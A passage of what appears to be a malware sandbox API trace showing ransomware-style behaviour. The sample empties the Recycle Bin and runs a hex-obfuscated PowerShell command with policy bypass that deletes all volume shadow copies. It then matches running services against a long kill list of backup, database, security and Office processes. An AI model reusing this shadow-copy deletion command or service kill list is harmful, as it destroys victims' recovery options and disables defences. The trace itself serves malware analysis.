dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff548) returned 0x4faec0 [0094.327] wcscpy (in: _Dest=0x3ff138, _Source="\\\\?\\C:\\$Recycle.Bin\\S-*" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-*") returned="\\\\?\\C:\\$Recycle.Bin\\S-*" [0094.327] wcscpy (in: _Dest=0x3ff160, _Source="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: _Dest="S-1-5-21-3388679973-3930757225-3770151564-1000") returned="S-1-5-21-3388679973-3930757225-3770151564-1000" [0094.327] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2dc4d48 [0094.327] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2dd4d50 [0094.329] wcscpy (in: _Dest=0x2dc4d48, _Source="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0094.329] wcslen (_String="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 0x42 [0094.329] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", fInfoLevelId=0x0, lpFindFileData=0x3feebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3feebc) returned 0x2db86c0 [0094.329] FindNextFileW (in: hFindFile=0x2db86c0, lpFindFileData=0x3feebc | out: lpFindFileData=0x3feebc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.331] FindNextFileW (in: hFindFile=0x2db86c0, lpFindFileData=0x3feebc | out: lpFindFileData=0x3feebc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.331] wcscpy (in: _Dest=0x2dd4d50, _Source="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0094.331] wcslen (_String="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 0x42 [0094.331] wcscpy (in: _Dest=0x2dd4dd6, _Source="desktop.ini" | out: _Dest="desktop.ini") returned="desktop.ini" [0094.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0094.332] DeleteFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0094.335] FindNextFileW (in: hFindFile=0x2db86c0, lpFindFileData=0x3feebc | out: lpFindFileData=0x3feebc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0094.335] FindClose (in: hFindFile=0x2db86c0 | out: hFindFile=0x2db86c0) returned 1 [0094.335] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2dc4d48) returned 1 [0094.335] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2dd4d50) returned 1 [0094.335] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff548 | out: lpFindFileData=0x3ff548*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0094.335] FindClose (in: hFindFile=0x4faec0 | out: hFindFile=0x4faec0) returned 1 [0094.336] Wow64DisableWow64FsRedirection (in: OldValue=0x3ff8c0 | out: OldValue=0x3ff8c0*=0x0) returned 1 [0094.336] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8080000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3ff878*(cb=0x48, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ff868 | out: lpCommandLine="powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"", lpProcessInformation=0x3ff868*(hProcess=0x5e0, hThread=0x5dc, dwProcessId=0xb0, dwThreadId=0xa6c)) returned 1 [0094.348] WaitForSingleObject (hHandle=0x5e0, dwMilliseconds=0xffffffff) returned 0x0 [0136.041] CloseHandle (hObject=0x5e0) returned 1 [0136.041] CloseHandle (hObject=0x5dc) returned 1 [0136.041] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0136.041] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4ebed8 [0136.043] EnumServicesStatusExW (in: hSCManager=0x4ebed8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x3ff8cc, lpServicesReturned=0x3ff8c8, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x3ff8cc, lpServicesReturned=0x3ff8c8, lpResumeHandle=0x0) returned 0 [0136.045] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x486c) returned 0x2d7f5a8 [0136.045] EnumServicesStatusExW (in: hSCManager=0x4ebed8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x2d7f5a8, cbBufSize=0x486c, pcbBytesNeeded=0x3ff8cc, lpServicesReturned=0x3ff8c8, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2d7f5a8, pcbBytesNeeded=0x3ff8cc, lpServicesReturned=0x3ff8c8, lpResumeHandle=0x0) returned 1 [0136.047] _wcslwr (in: _String=0x2d83de0 | out: _String="adobeflashplayerupdatesvc") returned="adobeflashplayerupdatesvc" [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="vss") returned 0x0 [0136.048] wcslen (_String="vss") returned 0x3 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sql") returned 0x0 [0136.048] wcslen (_String="sql") returned 0x3 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="svc$") returned 0x0 [0136.048] wcslen (_String="svc$") returned 0x4 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="memtas") returned 0x0 [0136.048] wcslen (_String="memtas") returned 0x6 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mepocs") returned 0x0 [0136.048] wcslen (_String="mepocs") returned 0x6 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sophos") returned 0x0 [0136.048] wcslen (_String="sophos") returned 0x6 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="veeam") returned 0x0 [0136.048] wcslen (_String="veeam") returned 0x5 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="backup") returned 0x0 [0136.048] wcslen (_String="backup") returned 0x6 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxVss") returned 0x0 [0136.048] wcslen (_String="GxVss") returned 0x5 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxBlr") returned 0x0 [0136.048] wcslen (_String="GxBlr") returned 0x5 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxFWD") returned 0x0 [0136.048] wcslen (_String="GxFWD") returned 0x5 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxCVD") returned 0x0 [0136.048] wcslen (_String="GxCVD") returned 0x5 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxCIMgr") returned 0x0 [0136.048] wcslen (_String="GxCIMgr") returned 0x7 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBCFMonitorService") returned 0x0 [0136.048] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="thebat") returned 0x0 [0136.048] wcslen (_String="thebat") returned 0x6 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="dbeng50") returned 0x0 [0136.048] wcslen (_String="dbeng50") returned 0x7 [0136.048] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="winword") returned 0x0 [0136.049] wcslen (_String="winword") returned 0x7 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="dbsnmp") returned 0x0 [0136.049] wcslen (_String="dbsnmp") returned 0x6 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamTransportSvc") returned 0x0 [0136.049] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="disk+work") returned 0x0 [0136.049] wcslen (_String="disk+work") returned 0x9 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.049] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="firefox") returned 0x0 [0136.049] wcslen (_String="firefox") returned 0x7 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBIDPService") returned 0x0 [0136.049] wcslen (_String="QBIDPService") returned 0xc [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="steam") returned 0x0 [0136.049] wcslen (_String="steam") returned 0x5 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="onenote") returned 0x0 [0136.049] wcslen (_String="onenote") returned 0x7 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="CVMountd") returned 0x0 [0136.049] wcslen (_String="CVMountd") returned 0x8 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="cvd") returned 0x0 [0136.049] wcslen (_String="cvd") returned 0x3 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamDeploymentSvc") returned 0x0 [0136.049] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamNFSSvc") returned 0x0 [0136.049] wcslen (_String="VeeamNFSSvc") returned 0xb [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="bedbh") returned 0x0 [0136.049] wcslen (_String="bedbh") returned 0x5 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mydesktopqos") returned 0x0 [0136.049] wcslen (_String="mydesktopqos") returned 0xc [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="avscc") returned 0x0 [0136.049] wcslen (_String="avscc") returned 0x5 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="infopath") returned 0x0 [0136.049] wcslen (_String="infopath") returned 0x8 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="cvfwd") returned 0x0 [0136.049] wcslen (_String="cvfwd") returned 0x5 [0136.049] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="excel") returned 0x0 [0136.049] wcslen (_String="excel") returned 0x5 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="beserver") returned 0x0 [0136.050] wcslen (_String="beserver") returned 0x8 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="powerpnt") returned 0x0 [0136.050] wcslen (_String="powerpnt") returned 0x8 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mspub") returned 0x0 [0136.050] wcslen (_String="mspub") returned 0x5 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="synctime") returned 0x0 [0136.050] wcslen (_String="synctime") returned 0x8 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBDBMgrN") returned 0x0 [0136.050] wcslen (_String="QBDBMgrN") returned 0x8 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="tv_w32.exe") returned 0x0 [0136.050] wcslen (_String="tv_w32.exe") returned 0xa [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="EnterpriseClient") returned 0x0 [0136.050] wcslen (_String="EnterpriseClient") returned 0x10 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="msaccess") returned 0x0 [0136.050] wcslen (_String="msaccess") returned 0x8 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="ocssd") returned 0x0 [0136.050] wcslen (_String="ocssd") returned 0x5 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mydesktopservice") returned 0x0 [0136.050] wcslen (_String="mydesktopservice") returned 0x10 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sqbcoreservice") returned 0x0 [0136.050] wcslen (_String="sqbcoreservice") returned 0xe [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="CVODS") returned 0x0 [0136.050] wcslen (_String="CVODS") returned 0x5 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="DellSystemDetect") returned 0x0 [0136.050] wcslen (_String="DellSystemDetect") returned 0x10 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="oracle") returned 0x0 [0136.050] wcslen (_String="oracle") returned 0x6 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="ocautoupds") returned 0x0 [0136.050] wcslen (_String="ocautoupds") returned 0xa [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="wordpad") returned 0x0 [0136.050] wcslen (_String="wordpad") returned 0x7 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="visio") returned 0x0 [0136.050] wcslen (_String="visio") returned 0x5 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAP") returned 0x0 [0136.050] wcslen (_String="SAP") returned 0x3 [0136.050] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="bengien") returned 0x0 [0136.051] wcslen (_String="bengien") returned 0x7 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="TeamViewer.exe") returned 0x0 [0136.051] wcslen (_String="TeamViewer.exe") returned 0xe [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="agntsvc") returned 0x0 [0136.051] wcslen (_String="agntsvc") returned 0x7 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="CagService") returned 0x0 [0136.051] wcslen (_String="CagService") returned 0xa [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="avagent") returned 0x0 [0136.051] wcslen (_String="avagent") returned 0x7 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="ocomm") returned 0x0 [0136.051] wcslen (_String="ocomm") returned 0x5 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="outlook") returned 0x0 [0136.051] wcslen (_String="outlook") returned 0x7 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="saposcol") returned 0x0 [0136.051] wcslen (_String="saposcol") returned 0x8 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="xfssvccon") returned 0x0 [0136.051] wcslen (_String="xfssvccon") returned 0x9 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="isqlplussvc") returned 0x0 [0136.051] wcslen (_String="isqlplussvc") returned 0xb [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="pvlsvr") returned 0x0 [0136.051] wcslen (_String="pvlsvr") returned 0x6 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sql") returned 0x0 [0136.051] wcslen (_String="sql") returned 0x3 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="tbirdconfig") returned 0x0 [0136.051] wcslen (_String="tbirdconfig") returned 0xb [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="vxmon") returned 0x0 [0136.051] wcslen (_String="vxmon") returned 0x5 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="benetns") returned 0x0 [0136.051] wcslen (_String="benetns") returned 0x7 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="tv_x64.exe") returned 0x0 [0136.051] wcslen (_String="tv_x64.exe") returned 0xa [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="encsvc") returned 0x0 [0136.051] wcslen (_String="encsvc") returned 0x6 [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sapstartsrv") returned 0x0 [0136.051] wcslen (_String="sapstartsrv") returned 0xb [0136.051] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="vsnapvss") returned 0x0 [0136.052] wcslen (_String="vsnapvss") returned 0x8 [0136.052] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="raw_agent_svc") returned 0x0 [0136.052] wcslen (_String="raw_agent_svc") returned 0xd [0136.052] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="thunderbird") returned 0x0 [0136.052] wcslen (_String="thunderbird") returned 0xb [0136.052] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="saphostexec ") returned 0x0 [0136.052] wcslen (_String="saphostexec ") returned 0xc [0136.052] _wcslwr (in: _String=0x2d83d84 | out: _String="aelookupsvc") returned="aelookupsvc" [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="vss") returned 0x0 [0136.052] wcslen (_String="vss") returned 0x3 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="sql") returned 0x0 [0136.052] wcslen (_String="sql") returned 0x3 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="svc$") returned 0x0 [0136.052] wcslen (_String="svc$") returned 0x4 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="memtas") returned 0x0 [0136.052] wcslen (_String="memtas") returned 0x6 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="mepocs") returned 0x0 [0136.052] wcslen (_String="mepocs") returned 0x6 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="sophos") returned 0x0 [0136.052] wcslen (_String="sophos") returned 0x6 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="veeam") returned 0x0 [0136.052] wcslen (_String="veeam") returned 0x5 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="backup") returned 0x0 [0136.052] wcslen (_String="backup") returned 0x6 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="GxVss") returned 0x0 [0136.052] wcslen (_String="GxVss") returned 0x5 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="GxBlr") returned 0x0 [0136.052] wcslen (_String="GxBlr") returned 0x5 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="GxFWD") returned 0x0 [0136.052] wcslen (_String="GxFWD") returned 0x5 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="GxCVD") returned 0x0 [0136.052] wcslen (_String="GxCVD") returned 0x5 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="GxCIMgr") returned 0x0 [0136.052] wcslen (_String="GxCIMgr") returned 0x7 [0136.052] wcsstr (_Str="aelookupsvc", _SubStr="QBCFMonitorService") returned 0x0 [0136.052] wcslen (_String="QBCFMonitorService") returned 0x12 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="thebat") returned 0x0 [0136.053] wcslen (_String="thebat") returned 0x6 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="dbeng50") returned 0x0 [0136.053] wcslen (_String="dbeng50") returned 0x7 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="winword") returned 0x0 [0136.053] wcslen (_String="winword") returned 0x7 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="dbsnmp") returned 0x0 [0136.053] wcslen (_String="dbsnmp") returned 0x6 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="VeeamTransportSvc") returned 0x0 [0136.053] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="disk+work") returned 0x0 [0136.053] wcslen (_String="disk+work") returned 0x9 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="TeamViewer_Service.exe") returned 0x0 [0136.053] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="firefox") returned 0x0 [0136.053] wcslen (_String="firefox") returned 0x7 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="QBIDPService") returned 0x0 [0136.053] wcslen (_String="QBIDPService") returned 0xc [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="steam") returned 0x0 [0136.053] wcslen (_String="steam") returned 0x5 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="onenote") returned 0x0 [0136.053] wcslen (_String="onenote") returned 0x7 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="CVMountd") returned 0x0 [0136.053] wcslen (_String="CVMountd") returned 0x8 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="cvd") returned 0x0 [0136.053] wcslen (_String="cvd") returned 0x3 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="VeeamDeploymentSvc") returned 0x0 [0136.053] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="VeeamNFSSvc") returned 0x0 [0136.053] wcslen (_String="VeeamNFSSvc") returned 0xb [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="bedbh") returned 0x0 [0136.053] wcslen (_String="bedbh") returned 0x5 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="mydesktopqos") returned 0x0 [0136.053] wcslen (_String="mydesktopqos") returned 0xc [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="avscc") returned 0x0 [0136.053] wcslen (_String="avscc") returned 0x5 [0136.053] wcsstr (_Str="aelookupsvc", _SubStr="infopath") returned 0x0 [0136.054] wcslen (_String="infopath") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="cvfwd") returned 0x0 [0136.054] wcslen (_String="cvfwd") returned 0x5 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="excel") returned 0x0 [0136.054] wcslen (_String="excel") returned 0x5 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="beserver") returned 0x0 [0136.054] wcslen (_String="beserver") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="powerpnt") returned 0x0 [0136.054] wcslen (_String="powerpnt") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="mspub") returned 0x0 [0136.054] wcslen (_String="mspub") returned 0x5 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="synctime") returned 0x0 [0136.054] wcslen (_String="synctime") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="QBDBMgrN") returned 0x0 [0136.054] wcslen (_String="QBDBMgrN") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="tv_w32.exe") returned 0x0 [0136.054] wcslen (_String="tv_w32.exe") returned 0xa [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="EnterpriseClient") returned 0x0 [0136.054] wcslen (_String="EnterpriseClient") returned 0x10 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="msaccess") returned 0x0 [0136.054] wcslen (_String="msaccess") returned 0x8 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="ocssd") returned 0x0 [0136.054] wcslen (_String="ocssd") returned 0x5 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="mydesktopservice") returned 0x0 [0136.054] wcslen (_String="mydesktopservice") returned 0x10 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="sqbcoreservice") returned 0x0 [0136.054] wcslen (_String="sqbcoreservice") returned 0xe [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="CVODS") returned 0x0 [0136.054] wcslen (_String="CVODS") returned 0x5 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="DellSystemDetect") returned 0x0 [0136.054] wcslen (_String="DellSystemDetect") returned 0x10 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="oracle") returned 0x0 [0136.054] wcslen (_String="oracle") returned 0x6 [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="ocautoupds") returned 0x0 [0136.054] wcslen (_String="ocautoupds") returned 0xa [0136.054] wcsstr (_Str="aelookupsvc", _SubStr="wordpad") returned 0x0 [0136.054] wcslen (_String="wordpad") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="visio") returned 0x0 [0136.055] wcslen (_String="visio") returned 0x5 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="SAP") returned 0x0 [0136.055] wcslen (_String="SAP") returned 0x3 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="bengien") returned 0x0 [0136.055] wcslen (_String="bengien") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="TeamViewer.exe") returned 0x0 [0136.055] wcslen (_String="TeamViewer.exe") returned 0xe [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="agntsvc") returned 0x0 [0136.055] wcslen (_String="agntsvc") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="CagService") returned 0x0 [0136.055] wcslen (_String="CagService") returned 0xa [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="avagent") returned 0x0 [0136.055] wcslen (_String="avagent") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="ocomm") returned 0x0 [0136.055] wcslen (_String="ocomm") returned 0x5 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="outlook") returned 0x0 [0136.055] wcslen (_String="outlook") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="saposcol") returned 0x0 [0136.055] wcslen (_String="saposcol") returned 0x8 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="xfssvccon") returned 0x0 [0136.055] wcslen (_String="xfssvccon") returned 0x9 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="isqlplussvc") returned 0x0 [0136.055] wcslen (_String="isqlplussvc") returned 0xb [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="pvlsvr") returned 0x0 [0136.055] wcslen (_String="pvlsvr") returned 0x6 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="sql") returned 0x0 [0136.055] wcslen (_String="sql") returned 0x3 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="tbirdconfig") returned 0x0 [0136.055] wcslen (_String="tbirdconfig") returned 0xb [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="vxmon") returned 0x0 [0136.055] wcslen (_String="vxmon") returned 0x5 [0136.055] wcsstr (_Str="aelookupsvc", _SubStr="benetns") returned 0x0 [0136.055] wcslen (_String="benetns") returned 0x7 [0136.055] wcsstr (_Str="aelookupsvc", 